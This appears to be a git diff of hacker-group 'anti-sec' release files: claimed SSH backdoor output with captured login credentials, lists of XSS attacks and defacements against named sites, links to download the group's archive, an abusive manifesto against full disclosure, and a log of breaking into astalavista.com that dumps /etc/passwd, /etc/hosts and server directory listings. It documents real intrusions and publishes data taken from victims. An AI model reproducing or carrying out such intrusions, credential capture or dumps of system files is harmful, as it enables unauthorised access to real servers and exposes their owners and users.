+cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/  -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl  -lcrypt
+ Compile          [  CHECK  ]
+ Running           [  CHECK  ]
+ ***             [  OsUcCu7hJA  ]
+ ***             [  6O7vp  ]
+ Game Over        [  CHECKMATE!  ]
+#--
+Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
+debian
+OsUcCu7hJA
+6O7vp
+#--
+
+
+debian:~# telnet 10.5.1.13 22
+Trying 10.5.1.13...
+Connected to 10.5.1.13.
+Escape character is '^]'.
+SSH-2.0-OpenSSH_5.1p1 Debian
+6O7vp
+HOOKIN: root:123!"£
+HOOKIN: testuser:testpass
+Protocol mismatch.
+Connection closed by foreign host.
+debian:~#
+
+
+
+_______         _______  ________    _________             
+\   _  \ ___  __\   _  \/   __   \  /   _____/ ____  ____  
+/  /_\  \\  \/  /  /_\  \____    /  \_____  \_/ __ \/  _ \ 
+\  \_/   \>    <\  \_/   \ /    /   /        \  ___(  <_> )
+ \_____  /__/\_ \\_____  //____/   /_______  /\___  >____/ 
+       \/      \/      \/                  \/     \/       
+________          __  .__        .__       .__                
+\_____  \ _______/  |_|__| _____ |__|______|__| ____    ____  
+ /   |   \\____ \   __\  |/     \|  \___   /  |/    \  / ___\ 
+/    |    \  |_> >  | |  |  Y Y  \  |/    /|  |   |  \/ /_/  >
+\_______  /   __/|__| |__|__|_|  /__/_____ \__|___|  /\___  / 
+        \/|__|                 \/         \/       \//_____/  
+
+
+
+1) http://www.xssed.com/archive/author=romeo
+
+Date  		Author  Domain  			PR  	Category  	Mirror
+25/04/09	RoMeO	www.akamai.com			19080	XSS	mirror
+22/03/09	RoMeO	press.1and1.com			6883	XSS	mirror
+05/07/08	RoMeO	scripts.mit.edu			999	XSS	mirror
+25/04/08	RoMeO	forgottenmem.net		304476	XSS	mirror
+25/04/08	RoMeO	www.h4ps.com			1753149	XSS	mirror
+23/04/08	RoMeO	www.batelco.jo			225973	XSS	mirror
+12/04/08	RoMeO	devscripts.net			1503804	XSS	mirror
+06/04/08	RoMeO	www.vlx.in			2998964	XSS	mirror
+06/04/08	RoMeO	www.ip2location.com		14646	XSS	mirror
+05/04/08	RoMeO	realitatea.net			13002	XSS	mirror
+03/04/08	RoMeO	www.name.com			13602	XSS	mirror
+03/04/08	RoMeO	templates.entheosweb.com	13380	XSS	mirror
+31/03/08	RoMeO	www.applyweb.com		50217	XSS	mirror
+31/03/08	RoMeO	www.aast.edu			64423	XSS	mirror
+31/03/08	RoMeO	www.cambridgescp.com		339535	XSS	mirror
+28/03/08	RoMeO	www.freelotto.com	R	306	XSS	mirror
+07/03/08	RoMeO	www.sandboxie.com		70663	XSS	mirror
+06/03/08	RoMeO	www.gulf-daily-news.com		14699	XSS	mirror
+06/03/08	RoMeO	www.aucegypt.edu		38023	XSS	mirror
+06/03/08	RoMeO	www.phpclanwebsite.com		986132	XSS	mirror
+05/03/08	RoMeO	www.rapid-hook.com		95252	XSS	mirror
+05/03/08	RoMeO	ipod.hopto.org			3648	XSS	mirror
+05/03/08	RoMeO	www.darkshado.ca		6134372	XSS	mirror
+03/03/08	RoMeO	www.macos.utah.edu		7333	XSS	mirror
+26/02/08	RoMeO	www.rapidzearch.com		3797044	XSS	mirror
+11/02/08	RoMeO	passport.51.com			184	XSS	mirror
+16/01/08	RoMeO	www.memset.com			192269	XSS	mirror
+07/01/08	RoMeO	search.mp3lyrics.org	R	4309	XSS	mirror
+07/01/08	RoMeO	qhost.eu			7969095	XSS	mirror
+05/01/08	RoMeO	www.lpbs.org.uk			2776181	XSS	mirror
+04/01/08	RoMeO	www.tdxp.net			0	XSS	mirror
+26/12/07	RoMeO	aljaras.com			53022	XSS	mirror
+16/12/07	RoMeO	www.sitemaps101.com		2163273	XSS	mirror
+15/12/07	RoMeO	www.xml-sitemaps.com		8847	XSS	mirror
+10/12/07	RoMeO	www.phpfaber.com		437969	XSS	mirror
+04/12/07	RoMeO	www.tis-edu.com			0	XSS	mirror
+29/11/07	RoMeO	pwnstarz.com			2025995	XSS	mirror
+23/11/07	RoMeO	www.gamesurge.net		101368	XSS	mirror
+23/11/07	RoMeO	cityguide.aol.com		54	XSS	mirror
+21/11/07	RoMeO	my.notnet.co.uk			1419849	XSS	mirror
+06/11/07	RoMeO	kwikhost.com			3593939	XSS	mirror
+06/11/07	RoMeO	my.aol.com			54	XSS	mirror
+06/11/07	RoMeO	www.searchtons.com		145218	XSS	mirror
+05/11/07	RoMeO	www.seologs.com			18186	XSS	mirror
+05/11/07	RoMeO	tools.elitehackers.info		151229	XSS	mirror
+05/11/07	RoMeO	gallery.particlesoft.net	364744	XSS	mirror
+04/11/07	RoMeO	www.filecart.com		27636	XSS	mirror
+04/11/07	RoMeO	chollotenis.com			0	XSS	mirror
+02/11/07	RoMeO	tsdepot.co.uk	R		6739237	XSS	mirror
+02/11/07	RoMeO	www.pesladder.com		1172005	XSS	mirror
+31/10/07	RoMeO	www.omni-chat.com		1857220	XSS	mirror
+28/10/07	RoMeO	www.anafit.com			2563280	XSS	mirror
+28/10/07	RoMeO	www.hellboundhackers.org	213995	XSS	mirror
+28/10/07	RoMeO	www.cyclelogic.co.uk		3361622	XSS	mirror
+16/10/07	RoMeO	tsdepot.co.uk			6739237	XSS	mirror
+06/10/07	RoMeO	www.terrytrophy.com		0	XSS	mirror
+03/10/07	RoMeO	www13.cd-wow.com		28971	XSS	mirror
+03/10/07	RoMeO	www.drbeat.li			8200365	XSS	mirror
+02/10/07	RoMeO	services.embark.com		12027	XSS	mirror
+27/09/07	RoMeO	ascii.techhappens.com		1215439	XSS	mirror
+20/09/07	RoMeO	www.org-rc.fr			1884591	XSS	mirror
+26/06/07	RoMeO	search.fbi.gov			11963	XSS	mirror
+
+
+2) http://www.zone-h.org/archive/defacer=romeo
+
+Time  		Attacker  	H  	M  	R  	Domain  		OS  		View
+2007/11/06 	Romeo 	H 				trakyagirl.uni.cc 	Win 2003 	mirror
+2007/09/23 	RomeO 	H 		R 		www.zexir.tk 	Linux 	mirror
+2006/12/11 	RoMeO 					www.koturkiye.com/hacked 	Linux 	mirror
+2006/10/21 	ROMEO 	H 				www.duyguajans.com 	FreeBSD 	mirror
+2006/09/06 	romeo 		M 			www.yeniliman.com/forum 	Linux 	mirror
+2006/09/06 	romeo 		M 			www.genc4um.com/forum 	Linux 	mirror
+2006/09/06 	ROMEO 	H 				www.forumhersey.com 	Linux 	mirror
+2006/09/05 	ROMEO 		M 			www.muzikogretmenleri.com/foru... 	Linux 	mirror
+2006/09/05 	ROMEO 		M 			www.sanalailem.com/forum 	Linux 	mirror
+2006/09/05 	ROMEO 					rocksitesi.net/forum/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 					www.beyazrenkler.com/forum/ind... 	Linux 	mirror
+2006/09/05 	ROMEO 					www.yasakmp3.com/forum/index.php 	Win 2003 	mirror
+2006/09/05 	ROMEO 					www.forumekani.com/index.php 	Linux 	mirror
+2006/09/05 	romeo 					www.turkfr.com/index.php 	Linux 	mirror
+2006/09/05 	romeo 					www.gizemliforum.org/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 					www.arkadasbilisim.com/forum/i... 	Linux 	mirror
+2006/09/05 	ROMEO 					www.modifiyedunyasi.com/forum/... 	Linux 	mirror
+2006/09/05 	ROMEO 					www.forzatc.net/forum/index.php 	FreeBSD 	mirror
+2006/09/05 	ROMEO 					www.megaarsiv.net/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 					egeizmir.com/forum/index.php 	Linux 	mirror
+2006/09/05 	ROMEO 			R 		www.nokiacep.com/forum/index.php 	Win 2003 	mirror
+2006/09/04 	romeo 	H 				www.cyber-turka.org 	Win 2003 	mirror
+2006/07/12 	romeo 					www.cehennem.net/den 	Linux 	mirror
+2006/05/29 	romeo 	H 				gorno-altaisk.ru 	Linux 	mirror
+2006/05/29 	ROMEO 	H 	M 			www.nobel.uz 	Win 2000 	mirror
+2006/05/29  	ROMEO  	H  	 	R  	 	www.tdshi.uz  	Win 2000  	mirror
+2006/05/17 	romeo 	H 				forumliontr.com 	Linux 	mirror
+2006/05/02 	romeo 		M 			www.pichiz.biz/forum 	Linux 	mirror
+2006/05/02 	ROMEO 		M 			www.trmizah.com/smf 	Linux 	mirror
+2006/05/02 	ROMEO 	H 	M 			www.rapsohbeti.com 	Linux 	mirror
+2006/04/23 	romeo 					www.gecelerinforumu.com/forum/... 	Linux 	mirror
+2006/03/19 	romeo 					www.esmer.org/index.php 	Linux 	mirror
+2006/01/12 	romeo 		M 			sitebirligi.com/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			konya-kosk.bel.tr/~oyuncu/hack... 	Linux 	mirror
+2006/01/12 	romeo 		M 			aktueldershanesi.com/~oyuncu/h... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.hesapliweb.com/~oyuncu/hac... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.aheninsaat.com/~oyuncu/hac... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.mp3ilahi.com/~oyuncu/hacke... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.eurotipsters.com/~oyuncu/h... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.kardeslik.org/~oyuncu/hack... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.hiperx.net/~oyuncu/hacked/... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.najans.com/~oyuncu/hacked/... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.gulmece.net/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.cigilfm.com/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.gifturk.com/~oyuncu/hacked... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.why-islam.net/~oyuncu/hack... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.e-matrak.org/~oyuncu/hacke... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.kazancyolu.com/~oyuncu/hac... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.hiperstore.gen.tr/~oyuncu/... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.senarslan.com/~oyuncu/hack... 	Linux 	mirror
+2006/01/12  	romeo  	 	M  	 	 	www.aprohosting.net/~oyuncu//h...  	Linux  	mirror
+2006/01/12 	romeo 		M 	R 		www.gulum.net/~oyuncu//hacked/... 	Linux 	mirror
+2006/01/12 	romeo 		M 	R 		www.basinyayin.net/~oyuncu//ha... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.dinleradyo.com/~oyuncu//ha... 	Linux 	mirror
+2006/01/12 	romeo 		M 			www.sitetasarimi.com/~oyuncu//... 	Linux 	mirror
+2005/04/08 	romeo 					votedevoe.org/v-web/portal/cms... 	FreeBSD 	mirror
+2005/03/23 	romeo 			R 		www.willowsend.co.nz/index.php 	Linux 	mirror
+2005/03/23 	romeo 	H 	M 			moh.theclap.co.nz 	Linux 	mirror
+
+
+_______          ___________   
+\   _  \ ___  __/_   \   _  \  
+/  /_\  \\  \/  /|   /  /_\  \ 
+\  \_/   \>    < |   \  \_/   \
+ \_____  /__/\_ \|___|\_____  /
+       \/      \/           \/ 
+__________                             __  .__                
+\______   \ ____ ______   ____________/  |_|__| ____    ____  
+ |       _// __ \\____ \ /  _ \_  __ \   __\  |/    \  / ___\ 
+ |    |   \  ___/|  |_> >  <_> )  | \/|  | |  |   |  \/ /_/  >
+ |____|_  /\___  >   __/ \____/|__|   |__| |__|___|  /\___  / 
+        \/     \/|__|                              \//_____/  
+
+
+1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
+2) http://www.fbi.gov/contact/fo/fo.htm
+3) http://www.treas.gov/usss/index.shtml
+4) http://www.ic3.gov/default.aspx
+5) http://www.tra.gov.ae/complaints.php
+
+
+_______          ____ ____ 
+\   _  \ ___  __/_   /_   |
+/  /_\  \\  \/  /|   ||   |
+\  \_/   \>    < |   ||   |
+ \_____  /__/\_ \|___||___|
+       \/      \/          
+   _____   __    __                .__                           __          
+  /  _  \_/  |__/  |______    ____ |  |__   _____   ____   _____/  |_  ______
+ /  /_\  \   __\   __\__  \ _/ ___\|  |  \ /     \_/ __ \ /    \   __\/  ___/
+/    |    \  |  |  |  / __ \\  \___|   Y  \  Y Y  \  ___/|   |  \  |  \___ \ 
+\____|__  /__|  |__| (____  /\___  >___|  /__|_|  /\___  >___|  /__| /____  >
+        \/                \/     \/     \/      \/     \/     \/          \/ 
+
+Mirrors
+
+1. http://rapidshare.com/files/328431323/antisec.tar.gz
+2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
+3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
+4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
+5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
+6. http://www.sendspace.com/file/07clr5
+
+
+_______          ____________  
+\   _  \ ___  __/_   \_____  \ 
+/  /_\  \\  \/  /|   |/  ____/ 
+\  \_/   \>    < |   /       \ 
+ \_____  /__/\_ \|___\_______ \
+       \/      \/            \/
+_________                      .__               .__               
+\_   ___ \  ____   ____   ____ |  |  __ __  _____|__| ____   ____  
+/    \  \/ /  _ \ /    \_/ ___\|  | |  |  \/  ___/  |/  _ \ /    \ 
+\     \___(  <_> )   |  \  \___|  |_|  |  /\___ \|  (  <_> )   |  \
+ \______  /\____/|___|  /\___  >____/____//____  >__|\____/|___|  /
+        \/            \/     \/                \/               \/ 
+
+What we tend to believe is that most of the so-called blackhats had lost or still strive towards the chance of 
+becoming an integral part of the information security industry and so they are blaming people who share old 
+and new information regarding the protection of corporate and personal information assets, including ICT systems 
+and social security.
+
+_______          ____________  
+\   _  \ ___  __/_   \_____  \ 
+/  /_\  \\  \/  /|   | _(__  < 
+\  \_/   \>    < |   |/       \
+ \_____  /__/\_ \|___/______  /
+       \/      \/           \/ 
+  ________                      __          
+ /  _____/______   ____   _____/  |_________
+/   \  __\_  __ \_/ __ \_/ __ \   __\___   /
+\    \_\  \  | \/\  ___/\  ___/|  |  /    / 
+ \______  /__|    \___  >\___  >__| /_____ \
+        \/            \/     \/           \/
+
+We want to thank the following people for their contribution. You know who you are!
+Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors
diff --git a/anti-sec/astalavista-comments.txt b/anti-sec/astalavista-comments.txt
new file mode 100644
index 0000000..a507bec
--- /dev/null
+++ b/anti-sec/astalavista-comments.txt
@@ -0,0 +1,136 @@
+
+	We have all seen the latest anti-sec hacks. We've been reading the comments and wanted to address a few of you.
+
+
+>> [ ProducedRaw ]
+>> I disagree. The guys they are targeting are blackhats and so they chose to be in the line of fire. It's like freaking out over a soldier getting shot.
+
+While you are right about them being in the line of fire by their own will, you
+are dead wrong about who these people are. Sometimes we have to remind ourselves
+about how ignorant the public is, due in full by the people getting paid to lie.
+
+You will be spared hearing about the long, long history behind hacking. This
+stuff is set-in-stone and there's not much people can do to argue for or against
+these definitions.
+
+Whitehat:    asshole who publicly posts exploits, tools, etc. normally sucks
+             dick for money (do you actually need a citation or have we shared
+	     enough?)
+Greyhat:     no such fucking thing
+Blackhat:    someone who is hacking and not posting shit public. But there's a
+             HUGE difference between the blackhat hacking scene and the
+	     underground. That's a long story though.
+
+Therefore, it's safe to say that this Astalavista cult and the rest of their
+sheep followers (no offense to sheep) are FAR from being blackhats or even
+respectable and intelligent "computer scientists" or whatever the fuck they feel
+like calling themselves.
+
+Why? Not only do they sit and run ./nmap and think they're badass but they
+MIRROR EXPLOITS that are publicly available and sell them. They make a living
+off of public and FREE information. They provide little kids with copy-and-paste
+tutorials on how to launch attacks with those scripts/tools/exploits too.
+
+But then they offer security solutions to another company... do you see what's
+going on here? They cause a problem, and provide (commercially) a fix for it.
+Hell, they can't even apply those patches to their own servers!
+
+>> [ illuminatedwax ]
+>> See I don't see a problem with getting hacked if people are using 0days on software that you haven't personally created. 
+>> That's just the way things are. But in this case apparently they stole some passwords from his Gmail account. That's fucking stupid.
+
+You are missing the point. If you're running a security website / company and at
+the same time you can't even secure your own god damn workspace, website, or
+server and you save plaintext passwords in databases, you deserve to be rm'd.
+
+It doesn't even matter if they were stolen passwords from the gmail account
+(they weren't). He should have been much smarter than that. He has an IT CV so
+big and a mouth even bigger yet he gets owned. There are no excuses and no
+conditions.
+
+>> [ xb4r7x ]
+>> lmao... that guy really needs to lay off the caps lock.
+>> [EDIT]: I was going to go on an anti-sec rant... but I have a call to go on. Will post when I'm back at my desk.
+>> [EDIT2]: Here's my opinion on anti-sec groups. If any of you belong to these groups, which I'm sure at least some of you do... 
+>> pay close attention to this, then look at yourself in the mirror. You'll thank me later.
+>> Black hats are people who sit in their basement on a computer with the lights off with the sole purpose of breaking into systems and causing mayhem. 
+>> Why? Well nobody really knows... but it's similar to a kid with a magnifying glass near an ant hill. 
+>> They generally lack social skills and for whatever reason don't want to develop them by going outside and enjoying the world. 
+>> They take pleasure in other people's pain, and have massive inferiority complexes.
+>> This is the main reason they do what they do IMO... they can't make friends like everyone else, feel inferior, 
+>> and need to prove to themselves that they're better than others. So they break into other people's computer systems to prove that they're better. 
+>> When really, they're just assholes with no life.
+>> There is another type of black hat as well... and they're just sadistic bastards with few redeeming qualities.
+>> Dear BH's Make the world a better place... don't try to destroy it just to see what happens. Nothing you've ever done, 
+>> or ever will do will keep people from living their lives. You're all cockroaches.
+>> 
+>> In all honesty, you can forget everything I just said... 
+>> I just have a serious problem with people who fuck with other people for what seems like no reason. Especially when they hide behind the internet.
+>> Oh yeah, and they're cry babies. "WAAAHHH DON'T TELL PEOPLE THEIR SHIT IS BROKEN!! THEN THEY'LL FIX IT AND I CAN'T ATTACK THEM ANYMORE!!!" - Idiots
+
+You have the general media image of a "blackhat", carved into your thoughts by
+the very people that we've exposed time and time again. The security industry
+has no facts to back up on their talk, and nor do you.
+
+Take a good look at the people getting pwned by the blackhats and the
+underground. It wasn't this way a long time ago, but you will notice that these
+days a good majority are promoting an industry and skewed culture which they
+are unable to learn from and apply to their own servers. They are hypocrites.
+
+There is some more terminology that we have to clear up.
+
+Hackers:   THEY HACK SHIT. They are not necessarily programmers that broke their
+           etch-a-sketches apart when they were 5 years old and inhaled the
+	   powder.
+Crackers - Reverse engineers, not "hackers who use the information for
+           destruction".
+
+Anything else is a fucking lie and anyone who believes it is taking it up the
+ass by not only the security industry but the whitehats that use stereotypes to
+enhance their own image and get them jobs.
+
+Now, when you look at all of the kids running rampant hacking random places with
+no skills at all, how are they obtaining the tools to do it? Sites like
+Astalavista and people like Glafkos ( nowayout ).
+
+Now do you see why we target these people? It's not about telling people, "your
+shit is broken," it is about ZERO DISCLOSURE of exploits to the general public.
+
+If you don't follow that, then you are contributing to the security industry and
+making a lot of fucktards money they do not deserve because they obtain it
+through lying and scaring people into using their products.
+
+This diagram will help demonstrate:
+
+[ Full-Disclosure ] ----> milw0rm / websites that mirror milw0rm / publish exploits / copy-and-paste tutorials ---> script kiddies with no clue on why / how said script 
+works,
+	but they do have a tutorial to follow, line by line ---> companies and people getting hacked / destroyed.
+	
+What are blackhats doing exactly?
+
+Hacking and exposing the websites / people who are promoting those exploits to the public, selling a service that they cannot provide, lying and cheating... 
+Hence why blackhats are against full disclosure Maybe a few good things do happen from full disclosure, but on the bigger picture it's mostly bad.
+
+>> [ xb4r7x ]
+>> Idc how much of an idiot the guy was for not securing his data. Hacking his box is still wrong... even if he did ask for it.
+>> It bothers me that people do this shit just to prove that they can.
+>> Although I was mildly amused that pretty early on in the list of emails they had detected the 'script kiddies'... but still did nothing to keep them out.
+
+If he was your average joe with no security on his data, it would have been all fine, but this guy actually says he is a security expert, his CV mentions 5+ certificates.
+
+This was not to prove they can, but more like to expose those people who claim they are security experts, claim they are whitehats... while it didnt take much effort to 
+break
+into there servers, find exploits, milw0rm mirrors, bad code, etc...
+
+>> [ chia_pet ]
+>> Wow. What a bunch of asshats. What's so horrifically wrong about publishing information that could lead to more security?
+
+Read above, you miss the point.. It is not against the security, it is against the security industry.
+
+>> [ benologist ]
+>> Who cares if they were profiting? Why are we against everyone but ourselves making money?
+
+It is more about how they were profiting, 
+disclosing exploits to the public then offering security against the huge threat of "hackers".. while they couldn't secure there own servers / scripts.
+
+
diff --git a/anti-sec/astalavista.txt b/anti-sec/astalavista.txt
new file mode 100644
index 0000000..b5f13e4
--- /dev/null
+++ b/anti-sec/astalavista.txt
@@ -0,0 +1,1983 @@
+
+   _____    _________________________  .____       _________   ____.___  _________________________   
+  /  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \  
+ /  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \ 
+/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
+\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
+        \/        \/                 \/        \/       \/                     \/                 \/ 
+                                  The Hacking & Security Community
+ [+] Founded in 1997 by a hacker computer enthusiast
+ [-] Exposed in 2009 by anti-sec group
+
+From < http://astalavista.com/faq>:
+>> 03. Who's behind the site?
+>>
+>> A team of security and IT professionals, and a countless number of contributors from all over the world.
+
+>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
+>>
+>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and 
+military institutions. 
+>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
+
+Why has Astalavista been targeted?
+
+Other than the fact that they are not doing any of this for the "community" but
+for the money, they spread exploits for kids, claim to be a security community
+(with no real sense of security on their own servers), and they charge you $6.66
+per months to access a dead forum with a directory filled with public releases
+and outdated / broken services.
+
+We wanted to see how good that "team of security and IT professionals" really is.
+
+Let's begin.
+
+anti-sec:~# ./g0tshell astalavista.com -p 80
+	[+] Connecting to astalavista.com:80
+	[+] Grabbing banner...
+		LiteSpeed
+	[+] Injecting shellcode...
+	[-] Wait for it
+	
+	[~] We g0tshell
+		uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+		ID: uid=100(apache) gid=500(apache) groups=500(apache)
+	
+sh-3.2$ cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+rpm:x:37:37::/var/lib/rpm:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+named:x:25:25:Named:/var/named:/sbin/nologin
+apache:x:100:500::/var/www:/bin/false
+diradmin:x:101:101::/usr/local/directadmin:/bin/bash
+mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
+webapps:x:500:501::/var/www/html:/bin/bash
+majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
+admin:x:501:502::/home/admin:/bin/bash
+jon:x:502:503::/home/jon:/bin/bash
+com:x:503:504::/home/com:/bin/bash
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
+astanet:x:504:505::/home/astanet:/bin/bash
+avahi:x:70:70:Avahi daemon:/:/sbin/nologin
+avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+
+sh-3.2$ cat /etc/hosts
+# Do not remove the following line, or various programs
+# that require network functionality will fail.
+127.0.0.1       localhost.localdomain   localhost
+::1     localhost6.localdomain6 localhost6
+80.74.154.172           asta1.astalavistaserver.com
+
+sh-3.2$ pwd
+/home/com/public_html
+
+sh-3.2$ ls -la
+total 18460
+drwxr-xr-x 30 com apache     4096 May 28 17:06 .
+drwx--x--x 11 com com        4096 Jun 25  2008 ..
+drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
+drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
+drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
+drwxrwxrwx  2 com com        4096 May 19 00:50 config
+drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
+drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
+drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
+drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
+drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
+-rw-r--r--  1 com com        8035 May 19 14:26 directory_to_mediadir.php
+drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
+drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor
+-rw-r--r--  1 com com        3750 Feb 27 16:12 favicon.ico
+drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
+-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
+-rw-r--r--  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak
+-rw-r--r--  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak
+drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
+drwxrwxrwx 14 com com        4096 Feb  2 19:29 images
+-rw-r--r--  1 com com       97496 Jun  2 13:01 index.php
+drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
+drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
+drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
+drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
+drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
+drwxr-xr-x 34 com com        4096 May 28 16:30 modules
+drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
+drwxrwxr-x 22 com com        4096 May 28 17:06 _new
+drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
+drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
+drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
+-rw-r--r--  1 com com          26 Feb  2 19:33 robots.txt
+-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
+-rw-r--r--  1 com com         223 Mar 30 15:32 test.php
+drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
+drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp
+drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam
+
+sh-3.2$ head -20 index.php
+
+
+sh-3.2$ cd modifications/
+sh-3.2$ ls -la
+total 32
+drwxr-xr-x  8 com com    4096 May 11 12:48 .
+drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng
+drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
+drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
+drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
+drwxr-xr-x  2 com com    4096 Feb  2 19:33 search
+drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
+
+sh-3.2$ ls -R
+.:
+com_avtng  cronjobs  onlinetools  pjirc  search  _tmp
+
+./com_avtng:
+avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts
+
+./com_avtng/scripts:
+popunder.js
+
+./cronjobs:
+exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
+
+./cronjobs/tmp:
+contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
+
+./onlinetools:
+index.php
+
+./pjirc:
+a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
+AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt
+background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd
+
+./pjirc/img:
